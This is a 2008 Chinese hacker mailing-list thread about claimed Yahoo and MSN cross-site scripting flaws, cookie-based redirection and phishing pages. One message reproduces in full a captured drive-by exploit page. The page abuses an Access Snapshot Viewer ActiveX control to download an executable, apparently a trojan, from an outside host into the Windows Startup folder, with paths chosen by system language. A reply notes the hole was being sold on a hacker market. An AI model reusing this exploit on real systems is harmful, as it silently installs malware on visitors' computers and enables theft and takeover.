2008/10/23 &悟!" <[EMAIL PROTECTED]> > http://www.coloreagle.com/yahoo/ddd.html > Office 组件 漏洞 跟yahoo没任何关系 > > 我可没说是yaho关系 ,上边一级 目录 其实是个钓鱼目录 > > ------------------ Original ------------------ > *From: *"linkboy"<[EMAIL PROTECTED]>; > *Date: *2008年10月23日(星期四) 下午2:26 > *To: *"ph4nt0m"<[email protected]>; > *Subject: *[Ph4nt0m] 回复: [Ph4nt0m] 好像yahoo跟MSN 目缯韭┒从斜晃彝诰虻 了 > > 恩 是有 。20日 已经有人在 www.hackertask.com 叫卖了。 > --- "[EMAIL PROTECTED]" <[EMAIL PROTECTED]>写道: > > > 2008-10-23 > > > > > > 今天 好像yahoo跟MSN的跨站漏洞有被我挖掘到了 > > > > > > 透露下一点点的小信息 跟上次的2次的 一样 > > 关键部分还是有点小变化的 > > 利用的document.cookie);关键语句达到跳 > > > > > > 转目的 地址:http://www.coloreagle.com/hotmail/ > > > > > > http://www.coloreagle.com/yahoo/ > > > > > > 我还无意中抓到了一个网马 > > > > http://www.coloreagle.com/yahoo/ddd.html > > > > > > > > 代码如下:<html> > > <object > > classid='clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9' > > id='obj'></object> > > > > > > > > <script language='JavaScript'> > > var buf1 = 'http://www.coloreagle.com/yahoo/a.exe'; > > var buf2; > > var sysLanguage; > > sysLanguage=navigator.systemLanguage? > > navigator.systemLanguage:navigator.language; > > if(sysLanguage == 'en-us' || sysLanguage == > > 'en-us'){ > > buf2="C:/Documents and Settings/All Users/Start > > Menu/Programs/ > > Startup/setup.exe"; > > } > > if(sysLanguage == 'zh-cn' || sysLanguage == > > 'zh-CN'){ > > buf2 = "C:/Documents and Settings/All > > Users/「开始」菜单/程序/启动/ > > setup.exe"; > > > > } > > obj.SnapshotPath = buf1; > > obj.CompressedPath = buf2; > > obj.PrintSnapshot(); > > > > </script> > > </html> > > > > > > > > 区分中英文版本 A。EXE是个木马 呵呵, > > > > > > > > 具体的细节我就不透露过多了 > > 毕竟一些大牛牛还是要靠这些来吃饭的 > > > > > > > > > > [EMAIL PROTECTED] > > 本人联系方式。有任何意见可以跟我交流 > > > > > > > > > > ___________________________________________________________ > 雅虎邮箱,您的终生邮箱! > http://cn.mail.yahoo.com/ > > > > >
--~--~---------~--~----~------------~-------~--~----~ 要向邮件组发送邮件,请发到 [email protected] 要退订此邮件,请发邮件至 [EMAIL PROTECTED] -~----------~----~----~----~------~----~------~--~---

